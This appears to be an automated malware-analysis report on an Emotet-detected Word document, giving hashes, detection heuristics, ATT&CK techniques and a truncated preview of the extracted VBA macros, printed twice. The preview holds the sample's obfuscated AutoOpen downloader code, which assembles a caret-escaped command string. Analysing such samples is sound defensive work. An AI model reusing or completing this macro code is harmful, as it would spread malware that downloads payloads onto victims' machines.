Emotet Office (OLE) malware analysis — malicious · 818c4000512ca4a8

MALICIOUS

Office (OLE)

204.2 KB Created: 2018-09-25 19:24:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: acbd03562eb5c1ec6596e6b1651ac73a SHA-1: f79d6357ccd5de4080de8cf99873b65e7acd746c SHA-256: 818c4000512ca4a82dfdee886f6b88ee50d385c6c5467eb9151dc6df79e0ed67

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including an AutoOpen macro, and a critical heuristic firing for Shell() calls, indicating malicious intent. ClamAV detection confirms this, identifying it as Emotet. The AutoOpen macro likely executes a command to download and run a secondary payload, a common Emotet tactic.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-6826486-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6826486-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 214322 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	214322 bytes
SHA-256: `e6e3ade9fe55a1bb0d6f4c2614abc359ad4ee0c4b06555f34706ea56183b17c8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "QtWikWz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim WrHMzj(1) WrHMzj(0) = Mid(QqcEbqww + RwoqaaXDUnEvvtQaLRskt + YtqsO, 503, 962) + Left(nqjRjpBj + MvjKLhYSSZlUCiFLFN + HFZAz, 880) + MidB(MjirLr + ijBfVObuwiLvUwzYElJhiwC + LuIKvZd, 476, 226) + MidB(tiiGCPL + hllXSduYXiTAujAoVraliB + HCfPlhW, 980, 508) Dim roXhzE(1) roXhzE(0) = Right(rBZCci + qYJkXjaCSJCrmkBXWv + HNlcm, 541) + Left(qzpRjwTK + ViivraZURaLYMCXm + asVSEBVv, 115) + MidB(MIanhMWK + IsWfPtUwwYHZJdmYkdO + zackipB, 534, 606) + MidB(zwmpPc + USEijYijmnrnjoJIpG + bwcmKqwJ, 154, 32) sQwdpbhsQHr (KeyString(SfEZosTs + GOvvzzHz + 11 + 8 + 3 + 9 + 36 + nDmVTI + ivJsDbw) + AzmimqNw + phWraA + KeyString(PsiGj + NokOLTz + 13 + 10 + 3 + 11 + 40 + HCUnB + ZDpIEI) + ZPtoFN + rqvXpPJ + ItSNwXRA + PzvhL + wWjQAjYZSWV + ivVuluj + mhFWVLWTZ + jCJIOWcBRK + rrvkSVWtR + MQhBikhdQwE + JNfOYHBmZzT + cjiDHwD + qECHW + FIYXkBBYB + jaVWzoadHoh + mZnOJCG + zhMkFSZiTKB + uswjGH + rrYILFBF) Dim dQEoH(2) dQEoH(0) = MidB(MKKCIDw + wSZawoAGqucBoDdcwqn + RNGSvjT, 238, 449) + Mid(YwDXo + iQKECIOFZUdZpIji + WWhEb, 595, 554) dQEoH(1) = MidB(FnumFcYN + KjitrtAEGunGKwLubnjWFUhi + zQvZu, 682, 479) + MidB(pLaailE + kouhvOjiKYZKBBpzO + ZSRnoAM, 39, 711) Dim FDYqrN(1) FDYqrN(0) = Right(nIfbhVIf + TtiCrjoVwPUvGEJhXLrbh + CriGDmU, 152) + MidB(LCLpACs + TMYWFpwNDcRBsJFPvcAnwZ + zrWJzHJ, 829, 408) Dim CZWckE(1) CZWckE(0) = MidB(rncfio + mwNZjzGkGDizkoPCHu + sUsPd, 258, 230) + MidB(zoTEsuC + PsdAkOGsrSlCcUErkztY + jKRqLt, 242, 10) + Mid(YdrkdIl + qwvMwQpLSvWUDDpCMzG + wvKdUNbO, 77, 78) + Left(lwSZoD + QHEwKhZjcWkMGFuVwq + QbLRFX, 549) End Sub Attribute VB_Name = "AwIIPVh" Function ZPtoFN() FujPnKFLw = "d " + CStr(Chr(7 + 1 + 3 + 3 + 33)) + "V^" + ":^" + "ON" + CStr(Chr(7 + 1 + 3 + 3 + 33)) + "C" + CStr(Chr(4 + 0 + 2 + 2 + 26)) + "s" + "^" + "e^" + "t" jcURdFlwNU = " " + "^+" + "^'" + ".^" + "`" + "=" + "5" + "01" + "^" + " " + "1" + "0" + "9" + "^" + " 0" oPNtJdXdbj = "9" + "^" + "3^" + " ^" + "91" PpYXErvjjQ = "0" + "^" + " " + "3" + "0" + "1" + "^ " + "^3" AuzTltlYw = "0" + "^1" + " " + "5" + "1^" + "3" + " ^" + "1^" + "3" nSqMHwC = "0" + "^ " + "9" + "^3" + "^" + "0 " + "^3" + "5" + "^9" + " 0" + "31" + "^" + " ^" + "10" ZPtoFN = FujPnKFLw + jcURdFlwNU + oPNtJdXdbj + PpYXErvjjQ + AuzTltlYw + nSqMHwC Dim XMQsRn(2) XMQsRn(0) = Left(Ewwipl + hprqbwzpAjwhGshAJBdH + AFaNjrwO, 835) + Mid(FcHYMbj + jkwXQHlczDhCsYbcIki + vaPabza, 888, 806) XMQsRn(1) = MidB(PHDwuk + uYvDifjzGIWwuUbhJfWJr + MlVfiYY, 923, 925) + Mid(XhuvI + hMRVmbGWBGXPDTuSUY + CwPbSqmN, 431, 928) + Left(GNqwt + VWpYpndaAqGPzWXznjQ + attdpcv, 479) + MidB(OaMZZ + MMMjqGNwTbukfFivDJnzERK + oCzwVIU, 67, 525) Dim OvRdZv(2) OvRdZv(0) = Mid(iHUvRf + kmJfwlPpprrmrDNaAnU + FDSfMdXH, 610, 814) + Left(HCRdo + LVSitcrDEhQRasNFDL + MwGbkAv, 954) + MidB(QzWmZ + jmTDwOipcZPismGinvsq + VNwbv, 773, 377) + MidB(TZwjNWss + WidVZGfqlOrvLMPHuoFa + RuGsLv, 47, 966) OvRdZv(1) = MidB(ZrrZULI + hcinkJclzjRHHMdmf + sdZXk, 402, 811) + Left(fcYFlnG + CSRwiSBkSIiMVjBONAo + QEoikWTG, 136) + Right(YvtuEEj + iAJfLkmrJHNidjjQN + bqUoa, 806) + MidB(IREOU + JXAUjOzYrdLQYVZcZSKX + jiAqJ, 352, 945) End Function Function rqvXpPJ() Dim jAGuwz(1) jAGuwz(0) = Left(KPSCUKnj + jblmzVLOfloLdpfPizmFilE + WGzhw, 523) + Left(BtDki + INWEpMosTCkzWsCIVI + skZfd, 935) + Mid(vsDwRPA + hmGOuqFnsKiZmacJPjLXBn + uaqmrYSo, 421, 498) + Left(tUsjEjwV + UHljOJVEaowLNTJHzE + javobS, 413) Dim IZczMb(1) IZczMb(0) = Left(zRWiVm + jfLAcZHjizUVhHCPRN + cGAcnjd, 767) + Mid(FEjTVOj + QhiSBXQbTWuwjtcwU + qQmQd, 223, 751) Dim lRFiAK(1) lRFiAK(0) = Mid(SGVPJ + fjwNnIYSoFGtwjjDM + UFIww, 600, 961) + Right(WfnJv + DWdtnvDsoYJljOXLtEpP + kkibfL, 962) Dim fmqIUi(2) fmqIUi(0) = Right(JsHbdaV + IPfDiCWdYcLBHBYWzok + VZwuWUum, 911) + MidB(oFkBku + GiVHkGOVzbaXdFFCAIdq + oMHXWm, 61, 36) fmqIUi(1) = Mid(RzSLnHw ... (truncated)

SHA-256: e6e3ade9fe55a1bb0d6f4c2614abc359ad4ee0c4b06555f34706ea56183b17c8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "QtWikWz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim WrHMzj(1)
WrHMzj(0) = Mid(QqcEbqww + RwoqaaXDUnEvvtQaLRskt + YtqsO, 503, 962) + Left(nqjRjpBj + MvjKLhYSSZlUCiFLFN + HFZAz, 880) + MidB(MjirLr + ijBfVObuwiLvUwzYElJhiwC + LuIKvZd, 476, 226) + MidB(tiiGCPL + hllXSduYXiTAujAoVraliB + HCfPlhW, 980, 508)
   Dim roXhzE(1)
roXhzE(0) = Right(rBZCci + qYJkXjaCSJCrmkBXWv + HNlcm, 541) + Left(qzpRjwTK + ViivraZURaLYMCXm + asVSEBVv, 115) + MidB(MIanhMWK + IsWfPtUwwYHZJdmYkdO + zackipB, 534, 606) + MidB(zwmpPc + USEijYijmnrnjoJIpG + bwcmKqwJ, 154, 32)
sQwdpbhsQHr (KeyString(SfEZosTs + GOvvzzHz + 11 + 8 + 3 + 9 + 36 + nDmVTI + ivJsDbw) + AzmimqNw + phWraA + KeyString(PsiGj + NokOLTz + 13 + 10 + 3 + 11 + 40 + HCUnB + ZDpIEI) + ZPtoFN + rqvXpPJ + ItSNwXRA + PzvhL + wWjQAjYZSWV + ivVuluj + mhFWVLWTZ + jCJIOWcBRK + rrvkSVWtR + MQhBikhdQwE + JNfOYHBmZzT + cjiDHwD + qECHW + FIYXkBBYB + jaVWzoadHoh + mZnOJCG + zhMkFSZiTKB + uswjGH + rrYILFBF)
   Dim dQEoH(2)
dQEoH(0) = MidB(MKKCIDw + wSZawoAGqucBoDdcwqn + RNGSvjT, 238, 449) + Mid(YwDXo + iQKECIOFZUdZpIji + WWhEb, 595, 554)
dQEoH(1) = MidB(FnumFcYN + KjitrtAEGunGKwLubnjWFUhi + zQvZu, 682, 479) + MidB(pLaailE + kouhvOjiKYZKBBpzO + ZSRnoAM, 39, 711)
   Dim FDYqrN(1)
FDYqrN(0) = Right(nIfbhVIf + TtiCrjoVwPUvGEJhXLrbh + CriGDmU, 152) + MidB(LCLpACs + TMYWFpwNDcRBsJFPvcAnwZ + zrWJzHJ, 829, 408)
   Dim CZWckE(1)
CZWckE(0) = MidB(rncfio + mwNZjzGkGDizkoPCHu + sUsPd, 258, 230) + MidB(zoTEsuC + PsdAkOGsrSlCcUErkztY + jKRqLt, 242, 10) + Mid(YdrkdIl + qwvMwQpLSvWUDDpCMzG + wvKdUNbO, 77, 78) + Left(lwSZoD + QHEwKhZjcWkMGFuVwq + QbLRFX, 549)
End Sub


Attribute VB_Name = "AwIIPVh"
Function ZPtoFN()
FujPnKFLw = "d " + CStr(Chr(7 + 1 + 3 + 3 + 33)) + "V^" + ":^" + "ON" + CStr(Chr(7 + 1 + 3 + 3 + 33)) + "C" + CStr(Chr(4 + 0 + 2 + 2 + 26)) + "s" + "^" + "e^" + "t"
jcURdFlwNU = " " + "^+" + "^'" + ".^" + "`" + "=" + "5" + "01" + "^" + " " + "1" + "0" + "9" + "^" + " 0"
oPNtJdXdbj = "9" + "^" + "3^" + " ^" + "91"
PpYXErvjjQ = "0" + "^" + " " + "3" + "0" + "1" + "^ " + "^3"
AuzTltlYw = "0" + "^1" + " " + "5" + "1^" + "3" + " ^" + "1^" + "3"
nSqMHwC = "0" + "^ " + "9" + "^3" + "^" + "0 " + "^3" + "5" + "^9" + " 0" + "31" + "^" + " ^" + "10"
ZPtoFN = FujPnKFLw + jcURdFlwNU + oPNtJdXdbj + PpYXErvjjQ + AuzTltlYw + nSqMHwC
   Dim XMQsRn(2)
XMQsRn(0) = Left(Ewwipl + hprqbwzpAjwhGshAJBdH + AFaNjrwO, 835) + Mid(FcHYMbj + jkwXQHlczDhCsYbcIki + vaPabza, 888, 806)
XMQsRn(1) = MidB(PHDwuk + uYvDifjzGIWwuUbhJfWJr + MlVfiYY, 923, 925) + Mid(XhuvI + hMRVmbGWBGXPDTuSUY + CwPbSqmN, 431, 928) + Left(GNqwt + VWpYpndaAqGPzWXznjQ + attdpcv, 479) + MidB(OaMZZ + MMMjqGNwTbukfFivDJnzERK + oCzwVIU, 67, 525)
   Dim OvRdZv(2)
OvRdZv(0) = Mid(iHUvRf + kmJfwlPpprrmrDNaAnU + FDSfMdXH, 610, 814) + Left(HCRdo + LVSitcrDEhQRasNFDL + MwGbkAv, 954) + MidB(QzWmZ + jmTDwOipcZPismGinvsq + VNwbv, 773, 377) + MidB(TZwjNWss + WidVZGfqlOrvLMPHuoFa + RuGsLv, 47, 966)
OvRdZv(1) = MidB(ZrrZULI + hcinkJclzjRHHMdmf + sdZXk, 402, 811) + Left(fcYFlnG + CSRwiSBkSIiMVjBONAo + QEoikWTG, 136) + Right(YvtuEEj + iAJfLkmrJHNidjjQN + bqUoa, 806) + MidB(IREOU + JXAUjOzYrdLQYVZcZSKX + jiAqJ, 352, 945)
End Function
Function rqvXpPJ()
Dim jAGuwz(1)
jAGuwz(0) = Left(KPSCUKnj + jblmzVLOfloLdpfPizmFilE + WGzhw, 523) + Left(BtDki + INWEpMosTCkzWsCIVI + skZfd, 935) + Mid(vsDwRPA + hmGOuqFnsKiZmacJPjLXBn + uaqmrYSo, 421, 498) + Left(tUsjEjwV + UHljOJVEaowLNTJHzE + javobS, 413)
   Dim IZczMb(1)
IZczMb(0) = Left(zRWiVm + jfLAcZHjizUVhHCPRN + cGAcnjd, 767) + Mid(FEjTVOj + QhiSBXQbTWuwjtcwU + qQmQd, 223, 751)
   Dim lRFiAK(1)
lRFiAK(0) = Mid(SGVPJ + fjwNnIYSoFGtwjjDM + UFIww, 600, 961) + Right(WfnJv + DWdtnvDsoYJljOXLtEpP + kkibfL, 962)
   Dim fmqIUi(2)
fmqIUi(0) = Right(JsHbdaV + IPfDiCWdYcLBHBYWzok + VZwuWUum, 911) + MidB(oFkBku + GiVHkGOVzbaXdFFCAIdq + oMHXWm, 61, 36)
fmqIUi(1) = Mid(RzSLnHw 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.